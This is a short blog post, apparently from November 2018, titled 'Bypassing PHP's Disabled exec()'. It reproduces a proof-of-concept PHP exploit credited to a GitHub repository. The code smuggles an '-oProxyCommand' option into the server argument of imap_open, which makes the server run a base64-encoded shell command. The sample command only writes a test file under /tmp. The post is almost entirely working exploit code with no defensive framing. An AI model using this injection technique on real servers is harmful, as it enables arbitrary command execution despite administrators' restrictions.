Posts

Showing posts from November, 2018

Bypassing PHP’s Disabled exec()

Source:  https://github.com/Bo0oM/PHP_imap_open_exploit <?php # https://antichat.com/threads/463395/#post-4254681 # echo ' 1234567890 '>/tmp/test0001 $server = " x -oProxyCommand=echo \t ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64 \t -d|sh} " ; imap_open ( ' { ' . $server . ' :143/imap}INBOX ' , ' ' , ' ' ) or die ( " \n\n Error: " . imap_last_error ()); ?>